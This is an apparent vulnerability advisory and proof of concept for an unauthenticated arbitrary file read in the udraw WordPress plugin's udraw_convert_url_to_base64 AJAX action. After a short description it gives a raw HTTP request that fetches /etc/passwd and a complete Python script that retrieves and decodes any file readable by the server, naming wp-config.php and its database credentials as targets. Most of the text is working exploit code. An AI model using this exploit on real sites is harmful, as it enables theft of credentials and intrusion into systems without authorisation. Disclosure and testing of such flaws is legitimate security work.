The plugin does not validate the `url` parameter of its `udraw_convert_url_to_base64` AJAX action (reachable by both unauthenticated and authenticated users through admin-ajax.php) before passing it to `file_get_contents` and returning the fetched content base64-encoded in the response. As a result, an unauthenticated attacker can read any file the web server process has permission to read, such as /etc/passwd or wp-config.php (which holds the database credentials and authentication salts).
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Connection: close
action=udraw_convert_url_to_base64&url=/etc/passwd
#!/usr/bin/env python3
#
# Usage:
# python3 poc.py <wordpress root url> <absolute filepath to include>
#
# Example:
# python3 poc.py http://127.0.0.1:8080/ /etc/passwd
#
import base64
import json
import sys

import requests
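# Upper bound on each request so the PoC fails loudly instead of hanging
# on a target that accepts the connection but never answers.
TIMEOUT_SECONDS = 30


def decode_response(body: str) -> bytes:
    """Return the file bytes carried in a udraw_convert_url_to_base64 reply.

    The action answers with a data URI of the form
    ``data:<mime>;base64,<payload>`` -- usually JSON-quoted, so ``"`` and
    ``\\/`` escapes may surround and pollute the payload. The body is JSON-
    decoded when possible, otherwise used verbatim; everything after the
    first comma is treated as the base64 section.

    Raises ValueError when the body is not a data URI, e.g. the bare ``0`` /
    ``-1`` that admin-ajax returns for an unknown or refused action.
    """
    try:
        text = json.loads(body)
    except ValueError:
        # Not JSON (or malformed JSON): fall back to the raw body.
        text = body
    if not isinstance(text, str):
        raise ValueError(f"unexpected non-string response: {body[:80]!r}")

    text = text.strip()
    _prefix, sep, payload = text.partition(",")
    if not sep or not payload:
        raise ValueError(f"no base64 payload in response: {body[:80]!r}")
    # Non-strict decoding, as in the original PoC: stray characters are
    # dropped rather than rejected.
    return base64.b64decode(payload)


def main(argv=None) -> int:
    """Run the PoC: fetch ``argv[2]`` from the WordPress site at ``argv[1]``.

    The raw file bytes are written to stdout (binary-safe, unlike printing a
    decoded string), diagnostics go to stderr. Returns the process exit
    status: 0 on success, 2 on a usage error, 1 when the target cannot be
    reached or its reply carries no file content.
    """
    argv = sys.argv if argv is None else argv
    if len(argv) != 3:
        print(
            f"usage: {argv[0]} <wordpress root url> <absolute filepath to include>",
            file=sys.stderr,
        )
        return 2

    target_url, filepath = argv[1], argv[2]
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    try:
        with requests.Session() as session:
            # Priming GET kept from the original PoC (cookies / warm-up); the
            # action is exposed to unauthenticated callers, so no login occurs.
            session.get(target_url, timeout=TIMEOUT_SECONDS)
            response = session.post(
                ajax_url,
                data={
                    "action": "udraw_convert_url_to_base64",
                    "url": filepath,
                },
                timeout=TIMEOUT_SECONDS,
            )
    except requests.RequestException as err:
        print(f"request to {ajax_url} failed: {err}", file=sys.stderr)
        return 1

    if not response.ok:
        print(f"target answered HTTP {response.status_code}", file=sys.stderr)
        return 1

    try:
        content = decode_response(response.text)
    except ValueError as err:
        print(f"could not extract file from response: {err}", file=sys.stderr)
        return 1

    sys.stdout.buffer.write(content)
    sys.stdout.flush()
    return 0


if __name__ == "__main__":
    sys.exit(main())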